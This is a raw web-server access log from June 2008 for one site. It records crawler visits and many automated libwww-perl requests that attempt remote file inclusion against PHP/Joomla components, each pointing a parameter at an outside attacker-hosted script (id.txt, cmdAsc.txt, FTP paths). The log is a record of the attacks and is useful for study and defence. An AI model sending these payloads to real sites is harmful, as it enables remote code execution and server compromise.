202.179.180.45 - - [25/Jun/2008:09:14:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
200.203.245.7 - - [25/Jun/2008:09:14:10 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:14:12 -0700] "GET //skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.179.180.45 - - [25/Jun/2008:09:14:14 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
61.247.192.42 - - [25/Jun/2008:09:14:15 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "dmulk.com"
61.247.192.42 - - [25/Jun/2008:09:14:16 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "dmulk.com"
61.247.192.42 - - [25/Jun/2008:09:14:17 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "dmulk.com"
69.20.61.23 - - [25/Jun/2008:09:14:37 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:14:38 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:14:38 -0700] "GET //skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:14:55 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:14:56 -0700] "GET //skin/zero_vote/error.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:14:57 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:15:04 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:15:05 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:15:34 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:15:34 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:15:41 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:15:42 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:15:42 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:15:44 -0700] "GET /logs/index.php?body=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:15:46 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:15:47 -0700] "GET //login.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:15:47 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:15:47 -0700] "GET /index.php?body=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 200 18403 "-" "libwww-perl/5.805" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:15:47 -0700] "GET /logs//login.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:15:47 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:15:47 -0700] "GET //login.php?dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:15:47 -0700] "GET /logs//login.php?dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:15:53 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:15:59 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:16:00 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:16:00 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:16:01 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:09:16:03 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 859311 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:16:11 -0700] "GET /logs/access_080129.log//appserv/main.php?appserv_root=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:16:11 -0700] "GET //appserv/main.php?appserv_root=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:16:12 -0700] "GET /logs//appserv/main.php?appserv_root=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:16:12 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:16:13 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:16:25 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:16:26 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:09:16:45 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:09:16:46 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:09:16:49 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:09:16:49 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:17:07 -0700] "GET /logs//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:17:08 -0700] "GET //main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:09:17:11 -0700] "GET /logs/access_080226.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:09:17:13 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:17:20 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:17:21 -0700] "GET //skin/zero_vote/error.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:17:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:09:17:22 -0700] "GET /logs/access_080127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.130.242.135 - - [25/Jun/2008:09:17:22 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [25/Jun/2008:09:17:24 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.75.39 - - [25/Jun/2008:09:17:26 -0700] "GET /logs//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [25/Jun/2008:09:17:26 -0700] "GET //main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:17:45 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:17:45 -0700] "GET //skin/zero_vote/error.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:17:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:17:56 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:18:09 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:18:22 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:18:22 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:19:09 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:19:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:09:19:24 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:19:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:19:26 -0700] "GET //skin/zero_vote/error.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:19:36 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:19:36 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:19:37 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:09:19:37 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:20:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:09:20:12 -0700] "GET //skin/zero_vote/error.php?dir=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:09:20:25 -0700] "GET /logs/access_080225.log//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:09:20:25 -0700] "GET //main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:09:20:25 -0700] "GET /logs//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.245.7 - - [25/Jun/2008:09:20:44 -0700] "GET /logs/access_080327.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:20:46 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.245.7 - - [25/Jun/2008:09:20:48 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.245.7 - - [25/Jun/2008:09:20:49 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.245.7 - - [25/Jun/2008:09:21:12 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:09:21:31 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:09:21:32 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:09:21:32 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:21:33 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??http://www.wkhm.com/css/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:09:21:45 -0700] "GET /logs/access_080225.log//appserv/main.php?appserv_root=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:22:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:09:22:26 -0700] "GET //skin/zero_vote/error.php?dir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:09:23:01 -0700] "GET /logs/access.log//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:09:23:26 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/cmd182182/31377.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:23:30 -0700] "GET /logs/access_080225.log//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:09:23:39 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:23:45 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.27.210 - - [25/Jun/2008:09:23:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.55.145 - - [25/Jun/2008:09:24:13 -0700] "GET /logs/access_080118.log/index.php?get=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.55.145 - - [25/Jun/2008:09:24:18 -0700] "GET /index.php?get=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18379 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.55.145 - - [25/Jun/2008:09:24:18 -0700] "GET /logs/index.php?get=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:09:24:33 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:09:24:47 -0700] "GET /logs/access_080304.log/?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:09:24:49 -0700] "GET /?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 18479 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:09:24:51 -0700] "GET /logs/?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 53419 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:09:24:52 -0700] "GET /logs/access_080307.log/?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:25:18 -0700] "GET /logs/access.log//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:09:25:47 -0700] "GET /logs/?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 53419 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:09:25:48 -0700] "GET /?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 18479 "-" "libwww-perl/5.76" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:09:26:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.246.52.72 - - [25/Jun/2008:09:26:55 -0700] "GET //skin/zero_vote/error.php?dir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:09:26:56 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:09:26:56 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:09:26:56 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
